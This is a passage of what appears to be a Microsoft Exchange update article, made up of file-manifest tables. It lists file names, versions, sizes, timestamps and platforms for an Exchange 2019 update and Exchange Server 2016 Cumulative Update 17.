Not applicable| 14,018| 12-Aug-2020| 20:42| Not applicable \nUpdatecas.ps1| Not applicable| 35,786| 12-Aug-2020| 20:41| Not applicable \nUpdateconfigfiles.ps1| Not applicable| 19,730| 12-Aug-2020| 20:41| Not applicable \nUpdateserver.exe| 15.2.595.6| 3,014,528| 12-Aug-2020| 20:42| x64 \nUpdate_malwarefilteringserver.ps1| Not applicable| 18,144| 12-Aug-2020| 20:42| Not applicable \nWeb.config_053c31bdd6824e95b35d61b0a5e7b62d| Not applicable| 31,813| 12-Aug-2020| 20:42| Not applicable \nWsbexchange.exe| 15.2.595.6| 125,320| 12-Aug-2020| 20:41| x64 \nX400prox.dll| 15.2.595.6| 103,296| 12-Aug-2020| 20:43| x64 \n_search.lingoperators.a| 15.2.595.6| 34,688| 12-Aug-2020| 20:42| Not applicable \n_search.lingoperators.b| 15.2.595.6| 34,688| 12-Aug-2020| 20:42| Not applicable \n_search.mailboxoperators.a| 15.2.595.6| 290,176| 12-Aug-2020| 20:41| Not applicable \n_search.mailboxoperators.b| 15.2.595.6| 290,176| 12-Aug-2020| 20:41| Not applicable \n_search.operatorschema.a| 15.2.595.6| 485,768| 12-Aug-2020| 20:41| Not applicable \n_search.operatorschema.b| 15.2.595.6| 485,768| 12-Aug-2020| 20:41| Not applicable \n_search.tokenoperators.a| 15.2.595.6| 113,536| 12-Aug-2020| 20:41| Not applicable \n_search.tokenoperators.b| 15.2.595.6| 113,536| 12-Aug-2020| 20:41| Not applicable \n_search.transportoperators.a| 15.2.595.6| 67,968| 12-Aug-2020| 20:41| Not applicable \n_search.transportoperators.b| 15.2.595.6| 67,968| 12-Aug-2020| 20:41| Not applicable \n \n## \n\n__\n\nExchange Server 2016 Cumulative Update 17\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nActivemonitoringeventmsg.dll| 15.1.2044.6| 71,048| 12-Aug-2020| 20:11| x64 \nActivemonitoringexecutionlibrary.ps1| Not applicable| 29,522| 12-Aug-2020| 20:14| Not applicable \nAdduserstopfrecursive.ps1| Not applicable| 14,945| 12-Aug-2020| 20:14| Not applicable \nAdemodule.dll| 15.1.2044.6| 106,368| 12-Aug-2020| 20:10| x64 \nAirfilter.dll| 15.1.2044.6| 42,872| 12-Aug-2020| 20:12| x64 \nAjaxcontroltoolkit.dll| 15.1.2044.6| 92,552| 12-Aug-2020| 20:14| x86 \nAntispamcommon.ps1| Not applicable| 13,489| 12-Aug-2020| 20:10| Not applicable \nAsdat.msi| Not applicable| 5,087,232| 12-Aug-2020| 20:14| Not applicable \nAsentirs.msi| Not applicable| 77,824| 12-Aug-2020| 20:14| Not applicable \nAsentsig.msi| Not applicable| 73,728| 12-Aug-2020| 20:14| Not applicable \nBigfunnel.bondtypes.dll| 15.1.2044.6| 43,904| 12-Aug-2020| 20:13| x86 \nBigfunnel.common.dll| 15.1.2044.6| 63,872| 12-Aug-2020| 20:15| x86 \nBigfunnel.configuration.dll| 15.1.2044.6| 99,200| 12-Aug-2020| 20:15| x86 \nBigfunnel.entropy.dll| 15.1.2044.6| 44,424| 12-Aug-2020| 20:12| x86 \nBigfunnel.filter.dll| 15.1.2044.6| 54,144| 12-Aug-2020| 20:14| x86 \nBigfunnel.indexstream.dll| 15.1.2044.6| 54,136| 12-Aug-2020| 20:15| x86 \nBigfunnel.poi.dll| 15.1.2044.6| 203,648| 12-Aug-2020| 20:15| x86 \nBigfunnel.postinglist.dll| 15.1.2044.6| 122,248| 12-Aug-2020| 20:15| x86 \nBigfunnel.query.dll| 15.1.2044.6| 99,712| 12-Aug-2020| 20:14| x86 \nBigfunnel.ranking.dll| 15.1.2044.6| 79,232| 12-Aug-2020| 20:15| x86 \nBigfunnel.syntheticdatalib.dll| 15.1.2044.6| 3,634,560| 12-Aug-2020| 20:15| x86 \nBigfunnel.wordbreakers.dll| 15.1.2044.6| 46,472| 12-Aug-2020| 20:15| x86 \nCafe_airfilter_dll| 15.1.2044.6| 42,872| 12-Aug-2020| 20:12| x64 \nCafe_exppw_dll| 15.1.2044.6| 83,328| 12-Aug-2020| 20:13| x64 \nCafe_owaauth_dll| 15.1.2044.6| 92,040| 12-Aug-2020| 20:12| x64 \nCalcalculation.ps1| Not applicable| 42,097| 12-Aug-2020| 20:15| Not applicable \nCheckdatabaseredundancy.ps1| Not applicable| 94,606| 12-Aug-2020| 20:10| Not applicable \nChksgfiles.dll| 15.1.2044.6| 57,224| 12-Aug-2020| 20:15| x64 \nCitsconstants.ps1| Not applicable| 15,805| 12-Aug-2020| 20:10| Not applicable \nCitslibrary.ps1| Not applicable| 82,664| 12-Aug-2020| 20:10| Not applicable \nCitstypes.ps1| Not applicable| 14,464| 12-Aug-2020| 20:10| Not applicable \nClassificationengine_mce| 15.1.2044.6| 1,693,056| 12-Aug-2020| 20:10| Not applicable \nClusmsg.dll| 15.1.2044.6| 134,016| 12-Aug-2020| 20:15| x64 \nCoconet.dll| 15.1.2044.6| 48,000| 12-Aug-2020| 20:11| x64 \nCollectovermetrics.ps1| Not applicable| 81,644| 12-Aug-2020| 20:10| Not applicable \nCollectreplicationmetrics.ps1| Not applicable| 41,870| 12-Aug-2020| 20:10| Not applicable \nCommonconnectfunctions.ps1| Not applicable| 29,947| 12-Aug-2020| 20:11| Not applicable \nComplianceauditservice.exe| 15.1.2044.6| 39,808| 12-Aug-2020| 20:15| x86 \nConfigureadam.ps1| Not applicable| 22,780| 12-Aug-2020| 20:14| Not applicable \nConfigurecaferesponseheaders.ps1| Not applicable| 20,324| 12-Aug-2020| 20:14| Not applicable \nConfigurenetworkprotocolparameters.ps1| Not applicable| 19,786| 12-Aug-2020| 20:14| Not applicable \nConfiguresmbipsec.ps1| Not applicable| 39,844| 12-Aug-2020| 20:14| Not applicable \nConfigure_enterprisepartnerapplication.ps1| Not applicable| 22,299| 12-Aug-2020| 20:14| Not applicable \nConnectfunctions.ps1| Not applicable| 37,141| 12-Aug-2020| 20:15| Not applicable \nConnect_exchangeserver_help.xml| Not applicable| 29,600| 12-Aug-2020| 20:15| Not applicable \nConsoleinitialize.ps1| Not applicable| 24,232| 12-Aug-2020| 20:13| Not applicable \nConvertoabvdir.ps1| Not applicable| 20,069| 12-Aug-2020| 20:14| Not applicable \nConverttomessagelatency.ps1| Not applicable| 14,548| 12-Aug-2020| 20:14| Not applicable \nConvert_distributiongrouptounifiedgroup.ps1| Not applicable| 34,781| 12-Aug-2020| 20:14| Not applicable \nCreate_publicfoldermailboxesformigration.ps1| Not applicable| 27,928| 12-Aug-2020| 20:14| Not applicable \nCts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 16:10| Not applicable \nCts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 16:10| Not applicable \nCts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 16:10| Not applicable \nCts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 16:10| Not applicable \nCts.14.4.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 16:10| Not applicable \nCts.15.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 16:10| Not applicable \nCts.15.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 16:10| Not applicable \nCts.15.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 16:10| Not applicable \nCts.15.20.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 16:10| Not applicable \nCts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 16:10| Not applicable \nCts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 16:10| Not applicable \nCts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 16:10| Not applicable \nCts_exsmime.dll| 15.1.2044.6| 380,800| 12-Aug-2020| 20:14| x64 \nCts_microsoft.exchange.data.common.dll| 15.1.2044.6| 1,686,912| 12-Aug-2020| 20:12| x86 \nCts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 16:10| Not applicable \nCts_policy.14.0.microsoft.exchange.data.common.dll| 15.1.2044.6| 12,672| 12-Aug-2020| 20:11| x86 \nCts_policy.14.1.microsoft.exchange.data.common.dll| 15.1.2044.6| 12,672| 12-Aug-2020| 20:11| x86 \nCts_policy.14.2.microsoft.exchange.data.common.dll| 15.1.2044.6| 12,672| 12-Aug-2020| 20:11| x86 \nCts_policy.14.3.microsoft.exchange.data.common.dll| 15.1.2044.6| 12,680| 12-Aug-2020| 20:11| x86 \nCts_policy.14.4.microsoft.exchange.data.common.dll| 15.1.2044.6| 12,680| 12-Aug-2020| 20:11| x86 \nCts_policy.15.0.microsoft.exchange.data.common.dll| 15.1.2044.6| 12,680| 12-Aug-2020| 20:11| x86 \nCts_policy.15.1.microsoft.exchange.data.common.dll| 15.1.2044.6| 12,672| 12-Aug-2020| 20:11| x86 \nCts_policy.15.2.microsoft.exchange.data.common.dll| 15.1.2044.6| 12,672| 12-Aug-2020| 20:11| x86 \nCts_policy.15.20.microsoft.exchange.data.common.dll| 15.1.2044.6| 12,680| 12-Aug-2020| 20:12| x86 \nCts_policy.8.0.microsoft.exchange.data.common.dll| 15.1.2044.6| 12,664| 12-Aug-2020| 20:11| x86 \nCts_policy.8.1.microsoft.exchange.data.common.dll| 15.1.2044.6| 12,664| 12-Aug-2020| 20:11| x86 \nCts_policy.8.2.microsoft.exchange.data.common.dll| 15.1.2044.6| 12,680| 12-Aug-2020| 20:11| x86 \nCts_policy.8.3.microsoft.exchange.data.common.dll| 15.1.2044.6| 12,672| 12-Aug-2020| 20:11| x86 \nDagcommonlibrary.ps1| Not applicable| 60,242| 12-Aug-2020| 20:10| Not applicable \nDependentassemblygenerator.exe| 15.1.2044.6| 22,400| 12-Aug-2020| 20:15| x86 \nDiaghelper.dll| 15.1.2044.6| 66,936| 12-Aug-2020| 20:10| x86 \nDiagnosticscriptcommonlibrary.ps1| Not applicable| 16,334| 12-Aug-2020| 20:10| Not applicable \nDisableinmemorytracing.ps1| Not applicable| 13,378| 12-Aug-2020| 20:14| Not applicable \nDisable_antimalwarescanning.ps1| Not applicable| 15,201| 12-Aug-2020| 20:14| Not applicable \nDisable_outsidein.ps1| Not applicable| 13,670| 12-Aug-2020| 20:14| Not applicable \nDisklockerapi.dll| Not applicable| 22,400| 12-Aug-2020| 20:15| x64 \nDlmigrationmodule.psm1| Not applicable| 39,596| 12-Aug-2020| 20:14| Not applicable \nDsaccessperf.dll| 15.1.2044.6| 45,952| 12-Aug-2020| 20:11| x64 \nDscperf.dll| 15.1.2044.6| 32,640| 12-Aug-2020| 20:10| x64 \nDup_cts_microsoft.exchange.data.common.dll| 15.1.2044.6| 1,686,912| 12-Aug-2020| 20:12| x86 \nDup_ext_microsoft.exchange.data.transport.dll| 15.1.2044.6| 601,472| 12-Aug-2020| 20:10| x86 \nEcpperfcounters.xml| Not applicable| 30,352| 12-Aug-2020| 20:12| Not applicable \nEdgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 12-Aug-2020| 16:10| Not applicable \nEdgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 15.1.2044.6| 12,672| 12-Aug-2020| 20:14| x86 \nEdgetransport.exe| 15.1.2044.6| 49,536| 12-Aug-2020| 20:14| x86 \nEext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 12-Aug-2020| 16:10| Not applicable \nEext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 12-Aug-2020| 16:10| Not applicable \nEext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 12-Aug-2020| 16:10| Not applicable \nEext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 12-Aug-2020| 16:10| Not applicable \nEext.14.4.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 12-Aug-2020| 16:10| Not applicable \nEext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 12-Aug-2020| 16:10| Not applicable \nEext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 12-Aug-2020| 16:10| Not applicable \nEext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 12-Aug-2020| 16:10| Not applicable \nEext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 12-Aug-2020| 16:10| Not applicable \nEext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 12-Aug-2020| 16:10| Not applicable \nEext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 12-Aug-2020| 16:10| Not applicable \nEext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 12-Aug-2020| 16:10| Not applicable \nEext_policy.14.0.microsoft.exchange.data.transport.dll| 15.1.2044.6| 12,680| 12-Aug-2020| 20:15| x86 \nEext_policy.14.1.microsoft.exchange.data.transport.dll| 15.1.2044.6| 12,672| 12-Aug-2020| 20:14| x86 \nEext_policy.14.2.microsoft.exchange.data.transport.dll| 15.1.2044.6| 12,672| 12-Aug-2020| 20:15| x86 \nEext_policy.14.3.microsoft.exchange.data.transport.dll| 15.1.2044.6| 12,672| 12-Aug-2020| 20:14| x86 \nEext_policy.14.4.microsoft.exchange.data.transport.dll| 15.1.2044.6| 12,664| 12-Aug-2020| 20:14| x86 \nEext_policy.15.0.microsoft.exchange.data.transport.dll| 15.1.2044.6| 12,672| 12-Aug-2020| 20:15| x86 \nEext_policy.15.1.microsoft.exchange.data.transport.dll| 15.1.2044.6| 12,680| 12-Aug-2020| 20:15| x86 \nEext_policy.15.2.microsoft.exchange.data.transport.dll| 15.1.2044.6| 12,680| 12-Aug-2020| 20:15| x86 \nEext_policy.15.20.microsoft.exchange.data.transport.dll| 15.1.2044.6| 13,192| 12-Aug-2020| 20:15| x86 \nEext_policy.8.1.microsoft.exchange.data.transport.dll| 15.1.2044.6| 12,664| 12-Aug-2020| 20:14| x86 \nEext_policy.8.2.microsoft.exchange.data.transport.dll| 15.1.2044.6| 12,672| 12-Aug-2020| 20:15| x86 \nEext_policy.8.3.microsoft.exchange.data.transport.dll| 15.1.2044.6| 12,680| 12-Aug-2020| 20:14| x86 \nEnableinmemorytracing.ps1| Not applicable| 13,380| 12-Aug-2020| 20:14| Not applicable \nEnable_antimalwarescanning.ps1| Not applicable| 17,579| 12-Aug-2020| 20:14| Not applicable \nEnable_basicauthtooauthconverterhttpmodule.ps1| Not applicable| 18,604| 12-Aug-2020| 20:14| Not applicable \nEnable_crossforestconnector.ps1| Not applicable| 18,614| 12-Aug-2020| 20:14| Not applicable \nEnable_outlookcertificateauthentication.ps1| Not applicable| 22,932| 12-Aug-2020| 20:14| Not applicable \nEnable_outsidein.ps1| Not applicable| 13,663| 12-Aug-2020| 20:14| Not applicable \nEngineupdateserviceinterfaces.dll| 15.1.2044.6| 17,792| 12-Aug-2020| 20:11| x86 \nEscprint.dll| 15.1.2044.6| 20,360| 12-Aug-2020| 20:10| x64 \nEse.dll| 15.1.2044.6| 3,695,496| 12-Aug-2020| 20:15| x64 \nEseback2.dll| 15.1.2044.6| 325,000| 12-Aug-2020| 20:11| x64 \nEsebcli2.dll| 15.1.2044.6| 292,736| 12-Aug-2020| 20:11| x64 \nEseperf.dll| 15.1.2044.6| 116,096| 12-Aug-2020| 20:10| x64 \nEseutil.exe| 15.1.2044.6| 398,720| 12-Aug-2020| 20:15| x64 \nEsevss.dll| 15.1.2044.6| 44,424| 12-Aug-2020| 20:11| x64 \nEtweseproviderresources.dll| 15.1.2044.6| 82,304| 12-Aug-2020| 20:15| x64 \nEventperf.dll| 15.1.2044.6| 59,768| 12-Aug-2020| 20:10| x64 \nExchange.depthtwo.types.ps1xml| Not applicable| 40,109| 12-Aug-2020| 20:15| Not applicable \nExchange.format.ps1xml| Not applicable| 648,612| 12-Aug-2020| 20:14| Not applicable \nExchange.partial.types.ps1xml| Not applicable| 43,326| 12-Aug-2020| 20:14| Not applicable \nExchange.ps1| Not applicable| 20,807| 12-Aug-2020| 20:15| Not applicable \nExchange.support.format.ps1xml| Not applicable| 26,551| 12-Aug-2020| 20:15| Not applicable \nExchange.types.ps1xml| Not applicable| 365,149| 12-Aug-2020| 20:14| Not applicable \nExchangeudfcommon.dll| 15.1.2044.6| 121,728| 12-Aug-2020| 20:15| x86 \nExchangeudfs.dll| 15.1.2044.6| 269,688| 12-Aug-2020| 20:14| x86 \nExchmem.dll| 15.1.2044.6| 85,888| 12-Aug-2020| 20:10| x64 \nExchsetupmsg.dll| 15.1.2044.6| 19,336| 12-Aug-2020| 20:15| x64 \nExchucutil.ps1| Not applicable| 23,936| 12-Aug-2020| 20:14| Not applicable \nExdbfailureitemapi.dll| Not applicable| 27,008| 12-Aug-2020| 20:11| x64 \nExdbmsg.dll| 15.1.2044.6| 229,752| 12-Aug-2020| 20:14| x64 \nExeventperfplugin.dll| 15.1.2044.6| 25,464| 12-Aug-2020| 20:10| x64 \nExmime.dll| 15.1.2044.6| 364,928| 12-Aug-2020| 20:15| x64 \nExportedgeconfig.ps1| Not applicable| 27,407| 12-Aug-2020| 20:14| Not applicable \nExport_mailpublicfoldersformigration.ps1| Not applicable| 18,570| 12-Aug-2020| 20:14| Not applicable \nExport_modernpublicfolderstatistics.ps1| Not applicable| 28,870| 12-Aug-2020| 20:14| Not applicable \nExport_outlookclassification.ps1| Not applicable| 14,378| 12-Aug-2020| 20:14| Not applicable \nExport_publicfolderstatistics.ps1| Not applicable| 23,141| 12-Aug-2020| 20:14| Not applicable \nExport_retentiontags.ps1| Not applicable| 17,060| 12-Aug-2020| 20:14| Not applicable \nExppw.dll| 15.1.2044.6| 83,328| 12-Aug-2020| 20:13| x64 \nExprfdll.dll| 15.1.2044.6| 26,504| 12-Aug-2020| 20:10| x64 \nExrpc32.dll| 15.1.2044.6| 1,922,944| 12-Aug-2020| 20:11| x64 \nExrw.dll| 15.1.2044.6| 28,032| 12-Aug-2020| 20:11| x64 \nExsetdata.dll| 15.1.2044.6| 2,779,008| 12-Aug-2020| 20:15| x64 \nExsetup.exe| 15.1.2044.6| 35,200| 12-Aug-2020| 20:14| x86 \nExsetupui.exe| 15.1.2044.6| 193,408| 12-Aug-2020| 20:15| x86 \nExtrace.dll| 15.1.2044.6| 245,128| 12-Aug-2020| 20:10| x64 \nExt_microsoft.exchange.data.transport.dll| 15.1.2044.6| 601,472| 12-Aug-2020| 20:10| x86 \nExwatson.dll| 15.1.2044.6| 44,928| 12-Aug-2020| 20:12| x64 \nFastioext.dll| 15.1.2044.6| 60,288| 12-Aug-2020| 20:15| x64 \nFil06f84122c94c91a0458cad45c22cce20| Not applicable| 784,715| 12-Aug-2020| 20:13| Not applicable \nFil143a7a5d4894478a85eefc89a6539fc8| Not applicable| 1,909,262| 12-Aug-2020| 20:13| Not applicable \nFil19f527f284a0bb584915f9994f4885c3| Not applicable| 648,794| 12-Aug-2020| 20:13| Not applicable \nFil1a9540363a531e7fb18ffe600cffc3ce| Not applicable| 358,405| 12-Aug-2020| 20:14| Not applicable \nFil220d95210c8697448312eee6628c815c| Not applicable| 303,657| 12-Aug-2020| 20:14| Not applicable \nFil2cf5a31e239a45fabea48687373b547c| Not applicable| 652,760| 12-Aug-2020| 20:13| Not applicable \nFil397f0b1f1d7bd44d6e57e496decea2ec| Not applicable| 784,712| 12-Aug-2020| 20:13| Not applicable \nFil3ab126057b34eee68c4fd4b127ff7aee| Not applicable| 784,688| 12-Aug-2020| 20:12| Not applicable \nFil41bb2e5743e3bde4ecb1e07a76c5a7a8| Not applicable| 149,154| 12-Aug-2020| 20:13| Not applicable \nFil51669bfbda26e56e3a43791df94c1e9c| Not applicable| 9,345| 12-Aug-2020| 20:13| Not applicable \nFil558cb84302edfc96e553bcfce2b85286| Not applicable| 85,259| 12-Aug-2020| 20:13| Not applicable \nFil55ce217251b77b97a46e914579fc4c64| Not applicable| 648,788| 12-Aug-2020| 20:12| Not applicable \nFil5a9e78a51a18d05bc36b5e8b822d43a8| Not applicable| 1,597,359| 12-Aug-2020| 20:10| Not applicable \nFil5c7d10e5f1f9ada1e877c9aa087182a9| Not applicable| 1,597,359| 12-Aug-2020| 20:10| Not applicable \nFil6569a92c80a1e14949e4282ae2cc699c| Not applicable| 1,597,359| 12-Aug-2020| 20:10| Not applicable \nFil6a01daba551306a1e55f0bf6894f4d9f| Not applicable| 648,764| 12-Aug-2020| 20:13| Not applicable \nFil8863143ea7cd93a5f197c9fff13686bf| Not applicable| 648,794| 12-Aug-2020| 20:13| Not applicable \nFil8a8c76f225c7205db1000e8864c10038| Not applicable| 1,597,359| 12-Aug-2020| 20:10| Not applicable \nFil8cd999415d36ba78a3ac16a080c47458| Not applicable| 784,718| 12-Aug-2020| 20:13| Not applicable \nFil97913e630ff02079ce9889505a517ec0| Not applicable| 1,597,359| 12-Aug-2020| 20:10| Not applicable \nFilaa49badb2892075a28d58d06560f8da2| Not applicable| 785,742| 12-Aug-2020| 20:13| Not applicable \nFilae28aeed23ccb4b9b80accc2d43175b5| Not applicable| 648,791| 12-Aug-2020| 20:12| Not applicable \nFilb17f496f9d880a684b5c13f6b02d7203| Not applicable| 784,718| 12-Aug-2020| 20:12| Not applicable \nFilb94ca32f2654692263a5be009c0fe4ca| Not applicable| 2,564,949| 12-Aug-2020| 20:12| Not applicable \nFilbabdc4808eba0c4f18103f12ae955e5c| Not applicable| 341,893,188| 12-Aug-2020| 20:12| Not applicable \nFilc92cf2bf29bed21bd5555163330a3d07| Not applicable| 652,778| 12-Aug-2020| 20:12| Not applicable \nFilcc478d2a8346db20c4e2dc36f3400628| Not applicable| 784,718| 12-Aug-2020| 20:13| Not applicable \nFild26cd6b13cfe2ec2a16703819da6d043| Not applicable| 1,597,359| 12-Aug-2020| 20:10| Not applicable \nFilf2719f9dc8f7b74df78ad558ad3ee8a6| Not applicable| 785,724| 12-Aug-2020| 20:12| Not applicable \nFilfa5378dc76359a55ef20cc34f8a23fee| Not applicable| 1,427,187| 12-Aug-2020| 20:13| Not applicable \nFilteringconfigurationcommands.ps1| Not applicable| 18,247| 12-Aug-2020| 20:14| Not applicable \nFilteringpowershell.dll| 15.1.2044.6| 223,112| 12-Aug-2020| 20:11| x86 \nFilteringpowershell.format.ps1xml| Not applicable| 29,652| 12-Aug-2020| 20:10| Not applicable \nFiltermodule.dll| 15.1.2044.6| 180,096| 12-Aug-2020| 20:10| x64 \nFipexeuperfctrresource.dll| 15.1.2044.6| 15,232| 12-Aug-2020| 20:15| x64 \nFipexeventsresource.dll| 15.1.2044.6| 44,928| 12-Aug-2020| 20:10| x64 \nFipexperfctrresource.dll| 15.1.2044.6| 32,640| 12-Aug-2020| 20:15| x64 \nFirewallres.dll| 15.1.2044.6| 72,576| 12-Aug-2020| 20:15| x64 \nFms.exe| 15.1.2044.6| 1,350,016| 12-Aug-2020| 20:10| x64 \nForefrontactivedirectoryconnector.exe| 15.1.2044.6| 110,976| 12-Aug-2020| 20:14| x64 \nFpsdiag.exe| 15.1.2044.6| 18,824| 12-Aug-2020| 20:10| x86 \nFsccachedfilemanagedlocal.dll| 15.1.2044.6| 822,144| 12-Aug-2020| 20:10| x64 \nFscconfigsupport.dll| 15.1.2044.6| 56,704| 12-Aug-2020| 20:15| x86 \nFscconfigurationserver.exe| 15.1.2044.6| 430,976| 12-Aug-2020| 20:10| x64 \nFscconfigurationserverinterfaces.dll| 15.1.2044.6| 15,744| 12-Aug-2020| 20:10| x86 \nFsccrypto.dll| 15.1.2044.6| 208,776| 12-Aug-2020| 20:10| x64 \nFscipcinterfaceslocal.dll| 15.1.2044.6| 28,544| 12-Aug-2020| 20:11| x86 \nFscipclocal.dll| 15.1.2044.6| 38,272| 12-Aug-2020| 20:10| x86 \nFscsqmuploader.exe| 15.1.2044.6| 453,504| 12-Aug-2020| 20:10| x64 \nGetucpool.ps1| Not applicable| 19,791| 12-Aug-2020| 20:14| Not applicable \nGetvalidengines.ps1| Not applicable| 13,274| 12-Aug-2020| 20:10| Not applicable \nGet_antispamfilteringreport.ps1| Not applicable| 15,793| 12-Aug-2020| 20:10| Not applicable \nGet_antispamsclhistogram.ps1| Not applicable| 14,639| 12-Aug-2020| 20:10| Not applicable \nGet_antispamtopblockedsenderdomains.ps1| Not applicable| 15,711| 12-Aug-2020| 20:10| Not applicable \nGet_antispamtopblockedsenderips.ps1| Not applicable| 14,759| 12-Aug-2020| 20:10| Not applicable \nGet_antispamtopblockedsenders.ps1| Not applicable| 15,482| 12-Aug-2020| 20:10| Not applicable \nGet_antispamtoprblproviders.ps1| Not applicable| 14,689| 12-Aug-2020| 20:10| Not applicable \nGet_antispamtoprecipients.ps1| Not applicable| 14,794| 12-Aug-2020| 20:10| Not applicable \nGet_dleligibilitylist.ps1| Not applicable| 42,348| 12-Aug-2020| 20:14| Not applicable \nGet_exchangeetwtrace.ps1| Not applicable| 28,963| 12-Aug-2020| 20:14| Not applicable \nGet_publicfoldermailboxsize.ps1| Not applicable| 15,042| 12-Aug-2020| 20:14| Not applicable \nGet_storetrace.ps1| Not applicable| 50,631| 12-Aug-2020| 20:10| Not applicable \nHuffman_xpress.dll| 15.1.2044.6| 32,648| 12-Aug-2020| 20:11| x64 \nImportedgeconfig.ps1| Not applicable| 77,264| 12-Aug-2020| 20:14| Not applicable \nImport_mailpublicfoldersformigration.ps1| Not applicable| 29,496| 12-Aug-2020| 20:14| Not applicable \nImport_retentiontags.ps1| Not applicable| 28,834| 12-Aug-2020| 20:14| Not applicable \nInproxy.dll| 15.1.2044.6| 85,896| 12-Aug-2020| 20:11| x64 \nInstallwindowscomponent.ps1| Not applicable| 34,523| 12-Aug-2020| 20:15| Not applicable \nInstall_antispamagents.ps1| Not applicable| 17,913| 12-Aug-2020| 20:10| Not applicable \nInstall_odatavirtualdirectory.ps1| Not applicable| 17,967| 12-Aug-2020| 20:14| Not applicable \nInterop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.1.2044.6| 107,392| 12-Aug-2020| 20:10| Not applicable \nInterop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.1.2044.6| 20,360| 12-Aug-2020| 20:15| Not applicable \nInterop.certenroll.dll| 15.1.2044.6| 142,728| 12-Aug-2020| 20:11| x86 \nInterop.licenseinfointerface.dll| 15.1.2044.6| 14,216| 12-Aug-2020| 20:10| x86 \nInterop.netfw.dll| 15.1.2044.6| 34,176| 12-Aug-2020| 20:10| x86 \nInterop.plalibrary.dll| 15.1.2044.6| 72,576| 12-Aug-2020| 20:14| x86 \nInterop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.1.2044.6| 27,008| 12-Aug-2020| 20:14| Not applicable \nInterop.taskscheduler.dll| 15.1.2044.6| 46,472| 12-Aug-2020| 20:10| x86 \nInterop.wuapilib.dll| 15.1.2044.6| 60,808| 12-Aug-2020| 20:15| x86 \nInterop.xenroll.dll| 15.1.2044.6| 39,808| 12-Aug-2020| 20:11| x86 \nKerbauth.dll| 15.1.2044.6| 62,856| 12-Aug-2020| 20:15| x64 \nLicenseinfointerface.dll| 15.1.2044.6| 643,464| 12-Aug-2020| 20:10| x64 \nLpversioning.xml| Not applicable| 19,638| 12-Aug-2020| 20:15| Not applicable \nMailboxdatabasereseedusingspares.ps1| Not applicable| 31,920| 12-Aug-2020| 20:11| Not applicable \nManagedavailabilitycrimsonmsg.dll| 15.1.2044.6| 138,632| 12-Aug-2020| 20:13| x64 \nManagedstorediagnosticfunctions.ps1| Not applicable| 125,841| 12-Aug-2020| 20:10| Not applicable \nManagescheduledtask.ps1| Not applicable| 36,356| 12-Aug-2020| 20:10| Not applicable \nMce.dll| 15.1.2044.6| 1,693,056| 12-Aug-2020| 20:10| x64 \nMeasure_storeusagestatistics.ps1| Not applicable| 29,503| 12-Aug-2020| 20:10| Not applicable \nMerge_publicfoldermailbox.ps1| Not applicable| 22,639| 12-Aug-2020| 20:14| Not applicable \nMicrosoft.database.isam.dll| 15.1.2044.6| 127,368| 12-Aug-2020| 20:15| x86 \nMicrosoft.dkm.proxy.dll| 15.1.2044.6| 25,992| 12-Aug-2020| 20:12| x86 \nMicrosoft.exchange.activemonitoring.activemonitoringvariantconfig.dll| 15.1.2044.6| 68,480| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.activemonitoring.eventlog.dll| 15.1.2044.6| 17,792| 12-Aug-2020| 20:14| x64 \nMicrosoft.exchange.addressbook.service.dll| 15.1.2044.6| 232,840| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.addressbook.service.eventlog.dll| 15.1.2044.6| 15,744| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.airsync.airsyncmsg.dll| 15.1.2044.6| 43,400| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.airsync.comon.dll| 15.1.2044.6| 1,775,488| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.airsync.dll1| 15.1.2044.6| 505,736| 12-Aug-2020| 20:14| Not applicable \nMicrosoft.exchange.airsynchandler.dll| 15.1.2044.6| 76,168| 12-Aug-2020| 20:16| x86 \nMicrosoft.exchange.anchorservice.dll| 15.1.2044.6| 135,552| 12-Aug-2020| 20:13| x86 \nMicrosoft.exchange.antispam.eventlog.dll| 15.1.2044.6| 23,432| 12-Aug-2020| 20:13| x64 